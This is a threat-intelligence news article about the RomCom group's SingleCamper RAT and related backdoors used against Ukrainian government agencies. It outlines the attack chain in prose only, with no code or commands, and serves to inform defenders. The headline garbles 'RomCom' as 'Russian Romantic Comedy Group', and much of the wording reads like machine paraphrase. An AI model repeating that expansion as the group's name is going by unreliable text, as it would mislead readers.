New Variation of SingleCamper RAT Released by Russian Romantic Comedy Group Targets Ukrainian Government
A recent series of cyber attacks targeting Ukrainian government agencies and undisclosed Polish organizations has been reportedly linked to the Russian RomCom threat actor group since late in 2023.
Reports indicate that the intrusions are identified by the utilization of a variation of the RomCom RAT named SingleCamper (also known as SnipBot or RomCom 5.0), according to insights from Cisco Talos, who is monitoring the activity cluster labeled UAT-5647.
“This latest edition is directly loaded into memory from the registry and employs a loopback address to establish communication with its loader,” highlighted security researchers Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura in their findings.
Identified as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, the RomCom group has been involved in diverse operations including ransomware, extortion, and targeted credential acquisition since its inception in 2022.
Recent evaluations indicate a surge in the frequency of their cyber attacks with a focus on establishing persistent access to compromised networks and extracting data, pointing towards a clear espionage-driven agenda.
It has been alleged that the threat actor group is actively expanding their arsenal and infrastructure to facilitate a broad spectrum of malicious tools coded in various languages and platforms like C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).
The attack sequences are initiated through a spear-phishing campaign that delivers a downloader — crafted in either C++ (MeltingClaw) or Rust (RustyClaw) — to facilitate the deployment of the ShadyHammock and DustyHammock backdoors, while also presenting a decoy document to maintain deception.
While DustyHammock is designed to establish communication with a command-and-control (C2) server, execute arbitrary commands, and retrieve files from the server, ShadyHammock serves as a springboard for SingleCamper and remains vigilant for incoming directives.
Although ShadyHammock boasts additional functionalities, it is speculated to be a precursor to DustyHammock, considering the latter’s involvement in recent attacks as recent as September 2024.
SingleCamper, the latest iteration of RomCom RAT, is responsible for a plethora of post-compromise actions, which include deploying the PuTTY’s Plink utility to create remote tunnels with adversary-controlled infrastructure, conducting network reconnaissance, lateral movement, user and system enumeration, and data exfiltration.
“This specific sequence of attacks, targeting prominent Ukrainian entities, is likely part of UAT-5647’s strategy to incrementally establish prolonged access and conduct data exfiltration to advance espionage aims, and potentially pivot to ransomware operations to disrupt and possibly benefit financially from the intrusion,” stated the researchers.
“It is plausible that Polish entities were also victims of these attacks, based on the language settings examined by the malware.”
About Author
